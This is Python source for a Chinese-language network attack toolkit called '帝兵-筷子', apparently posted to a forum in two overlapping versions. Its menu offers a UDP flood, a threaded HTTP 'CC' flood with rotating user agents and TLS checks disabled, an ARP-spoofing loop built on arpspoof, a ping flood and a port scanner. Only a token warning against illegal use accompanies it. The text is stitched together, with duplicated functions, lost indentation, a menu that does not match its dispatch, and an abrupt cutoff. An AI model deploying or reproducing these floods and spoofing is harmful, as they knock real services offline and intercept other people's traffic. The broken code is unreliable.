print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
def quick_port_scan():
"""快速端口扫描"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")
# 常见端口列表
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
open_ports = []
start_time = time.time()
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
sock.close()
return port, result == 0
except:
return port, False
# 使用多线程扫描
threads = []
for port in common_ports:
thread = threading.Thread(target=lambda p=port: open_ports.append(p) if scan_port(p)[1] else None)
threads.append(thread)
thread.start()
# 显示进度
for i, thread in enumerate(threads):
thread.join()
progress = ((i + 1) / len(common_ports)) * 100
print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)
elapsed_time = time.time() - start_time
print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")
if open_ports:
print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
}
for port in sorted(open_ports):
service = common_services.get(port, "未知服务")
status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
else:
print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def create_session():
"""创建优化的session"""
try:
import requests
if HAS_REQUESTS_ADAPTER:
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
else:
return requests
except:
return None
def super_cc_attack():
"""超级CC攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
import requests
except ImportError:
print(f"{Colors.RED}❌ requests 模块未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install requests{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-100): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 100:
threads_count = 100
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
if session:
response = session.get(url, headers=headers, verify=False, timeout=2)
else:
response = requests.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
last_print_time = time.time()
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 5, 20)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (20 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_time = time.time() - start_time
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{final_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/final_time:.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def udp_flood():
"""UDP洪水攻击 - 使用之前的版本"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
port = int(input(f"{Colors.YELLOW}🎯 目标端口: {Colors.END}"))
speed = int(input(f"{Colors.YELLOW}⚡ 攻击速度(1~1000): {Colors.END}"))
print(f"\n{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
sent = 0
while True:
try:
sock.sendto(bytes_data, (ip, port))
sent = sent + 1
print(f"\r{Colors.GREEN}已发送 {sent} 个数据包到 {ip} 端口 {port}{Colors.END}", end="", flush=True)
time.sleep((1000 - speed) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent} 个数据包{Colors.END}")
break
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
break
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent} 个数据包{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-7): {Colors.END}")
if choice == '1':
udp_flood()
elif choice == '2':
super_cc_attack()
elif choice == '3':
arp_spoof()
elif choice == '4':
quick_port_scan()
elif choice == '5':
ping_flood()
elif choice == '6':
show_system_info()
elif choice == '7':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
# 检查基本依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}警告: 缺少依赖 {', '.join(missing_deps)}")
print(f"请运行: pip install {' '.join(missing_deps)}{Colors.END}")
time.sleep(2)
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}")
使用道具 举报
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
    """ANSI escape sequences used to colour and style terminal output.

    Every attribute is a complete escape sequence. Emit ``END`` after styled
    text to reset the terminal to its default rendition.
    """

    # Foreground colours.
    RED = '\x1b[91m'
    GREEN = '\x1b[92m'
    YELLOW = '\x1b[93m'
    BLUE = '\x1b[94m'
    PURPLE = '\x1b[95m'
    CYAN = '\x1b[96m'
    WHITE = '\x1b[97m'

    # Text attributes.
    BOLD = '\x1b[1m'
    UNDERLINE = '\x1b[4m'

    # Reset all colours and attributes.
    END = '\x1b[0m'
def print_banner():
    """Clear the terminal and print the title banner.

    The screen is cleared with the external ``clear`` command, then the
    banner is written line by line to standard output.
    """
    os.system("clear")

    # The same horizontal rule opens and closes the banner.
    rule = Colors.PURPLE + "=" * 60 + Colors.END
    banner_lines = (
        rule,
        Colors.CYAN + Colors.BOLD,
        " ╔══════════════════════════════════╗",
        " ║ 帝兵-筷子 终极版 ║",
        " ║ EMPEROR WEAPON - CHOPSTICKS ║",
        " ╚══════════════════════════════════╝",
        Colors.END,
        Colors.YELLOW + " 网络安全测试工具集合",
        Colors.GREEN + " 作者: 跨紫大帝",
        Colors.RED + " 警告:请勿用于非法用途",
        rule,
    )
    for text in banner_lines:
        print(text)
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 (原始版) {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 🛠️ ApacheBench测试 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}8.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
    """Report which required third-party packages cannot be imported.

    Returns:
        list[str]: Names of the packages whose import raised ``ImportError``,
        in the order they were checked. Empty when every package imports.
    """
    unavailable = []
    for package in ("requests", "urllib3"):
        try:
            __import__(package)
        except ImportError:
            unavailable.append(package)
    return unavailable
def show_system_info():
    """Print a short diagnostic summary and wait for the user to press Enter.

    Shows the interpreter version, whether the required packages are
    importable (as reported by ``check_dependencies``), the local host name
    and the current local time. Blocks on ``input()`` before returning.
    """
    print_banner()
    print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
    print(f"{Colors.GREEN}{'─'*50}{Colors.END}")

    # Interpreter version.
    print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")

    # Dependency status.
    missing_deps = check_dependencies()
    if missing_deps:
        print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
        print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
    else:
        print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")

    # Host name is best-effort: skip the line if the lookup fails. Only
    # OSError is caught so that Ctrl+C and SystemExit are no longer swallowed
    # here, as they were by the previous bare ``except``.
    try:
        hostname = socket.gethostname()
    except OSError:
        hostname = None
    if hostname is not None:
        print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")

    # Current local time.
    print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
    input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
    """Return True if *ip* is a strict dotted-quad IPv4 address.

    The previous check used ``socket.inet_aton``, which also accepts
    shorthand forms such as ``"1"`` or ``"127.1"`` and, on some C libraries,
    trailing text after whitespace. Values like that are not safe to pass on
    to external commands, so they are rejected here.

    Args:
        ip: Candidate address. Anything that is not a ``str`` is rejected.

    Returns:
        bool: True only for four decimal octets separated by dots, each in
        the range 0-255, with no surrounding whitespace.
    """
    import ipaddress  # local import: not imported at module level

    # IPv4Address also accepts ints and packed bytes; only text is wanted.
    if not isinstance(ip, str):
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True
def get_mac(ip):
    """Look up the MAC address cached for *ip* in the system ARP table.

    Runs ``arp -n <ip>`` and scans its output for a line that names exactly
    this address, then returns the first field on that line that is shaped
    like a MAC address.

    Args:
        ip: Address to look up, as a non-empty string.

    Returns:
        The MAC address string, or None when *ip* is unusable, the ``arp``
        command is missing or fails, or no matching entry with a MAC
        address is found.
    """
    import re  # local import: not imported at module level

    # Refuse values that cannot be an address and anything that ``arp``
    # would interpret as a command-line option.
    if not isinstance(ip, str) or not ip or ip.startswith("-"):
        return None

    try:
        # Argument list, no shell: *ip* can never be interpreted as shell
        # syntax, unlike the previous f-string with shell=True.
        output = subprocess.check_output(
            ["arp", "-n", ip],
            text=True,
            stderr=subprocess.DEVNULL,
        )
    except (OSError, ValueError, subprocess.SubprocessError):
        # Command missing, non-zero exit status, or an unusable argument.
        return None

    mac_pattern = re.compile(r"(?:[0-9A-Fa-f]{1,2}:){5}[0-9A-Fa-f]{1,2}")
    for line in output.splitlines():
        fields = line.split()
        # Compare whole fields (ignoring surrounding parentheses) so that
        # 192.168.1.1 does not match the entry for 192.168.1.10.
        if not any(field.strip("()") == ip for field in fields):
            continue
        # Pick the field that looks like a MAC instead of a fixed column, so
        # header rows and "(incomplete)" entries are never returned.
        for field in fields:
            if mac_pattern.fullmatch(field):
                return field
    return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac:
print(f"{Colors.RED}❌ 无法获取目标MAC地址{Colors.END}")
return
if not gateway_mac:
print(f"{Colors.RED}❌ 无法获取网关MAC地址{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
arpspoof_processes = []
try:
while not stop_attack:
try:
# 发送ARP欺骗包
proc1 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", target_ip, gateway_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
proc2 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", gateway_ip, target_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
arpspoof_processes.extend([proc1, proc2])
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2)
# 清理旧的进程
for proc in arpspoof_processes[:]:
if proc.poll() is not None:
arpspoof_processes.remove(proc)
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 杀死所有arpspoof进程
for proc in arpspoof_processes:
try:
proc.terminate()
except:
pass
# 额外清理
os.system("pkill arpspoof 2>/dev/null")
time.sleep(2)
print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
def quick_port_scan():
    """Check a fixed list of common TCP ports on one host and print the result.

    Prompts for a target (IP address or host name), attempts a TCP connection
    to each port in ``common_ports`` using one thread per port with a
    2-second timeout, shows progress while the threads finish, and finally
    lists the ports that accepted the connection together with a
    conventional service name.
    """
    print_banner()
    print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
    print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
    target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")

    # Common ports to check.
    common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
                    2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
    print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
    print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
    print(f"{Colors.GREEN}{'─'*50}{Colors.END}")

    open_ports = []
    start_time = time.time()

    def scan_port(port):
        """Return ``(port, True)`` if a TCP connection to *port* succeeds."""
        try:
            # The context manager closes the socket even when connect_ex
            # raises (for example on a name-resolution failure); the previous
            # version leaked the socket on that path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(2)
                return port, sock.connect_ex((target, port)) == 0
        except (OSError, ValueError):
            # OSError covers resolution and network errors; ValueError covers
            # host names that cannot be encoded. Either way: not open.
            return port, False

    def record_if_open(port):
        """Thread body: remember *port* when it accepted the connection."""
        if scan_port(port)[1]:
            open_ports.append(port)

    # One thread per port.
    threads = []
    for port in common_ports:
        thread = threading.Thread(target=record_if_open, args=(port,))
        threads.append(thread)
        thread.start()

    # Join in start order and report progress after each thread finishes.
    for i, thread in enumerate(threads):
        thread.join()
        progress = ((i + 1) / len(common_ports)) * 100
        print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)

    elapsed_time = time.time() - start_time
    print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")

    if open_ports:
        print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
        common_services = {
            21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
            80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
            995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
            2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
            5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
        }
        for port in sorted(open_ports):
            service = common_services.get(port, "未知服务")
            # HTTP, HTTPS and SSH are shown in green, everything else yellow.
            status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
            print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
    else:
        print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def create_session():
"""创建优化的session"""
try:
import requests
from requests.adapters import HTTPAdapter
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
except:
return None
def super_cc_attack():
"""超级CC攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
try:
import requests
except ImportError:
print(f"{Colors.RED}❌ requests 模块未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install requests{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-100): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 100:
threads_count = 100
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
if session:
response = session.get(url, headers=headers, verify=False, timeout=2)
else:
response = requests.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
last_print_time = time.time()
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 5, 20)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (20 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_time = time.time() - start_time
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{final_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/final_time:.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def udp_flood_original():
"""UDP洪水攻击 - 使用原始版本"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式 (原始版本){Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
print(" ")
print("作者: 跨紫大帝")
print("请勿用于非法用途")
ip = input("请输入 IP : ")
port = int(input("攻击端口 : "))
sd = int(input("攻击速度(1~1000) : "))
os.system("clear")
# 创建socket和随机数据
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
print(f"{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
try:
while True:
sock.sendto(bytes_data, (ip, port))
sent = sent + 1
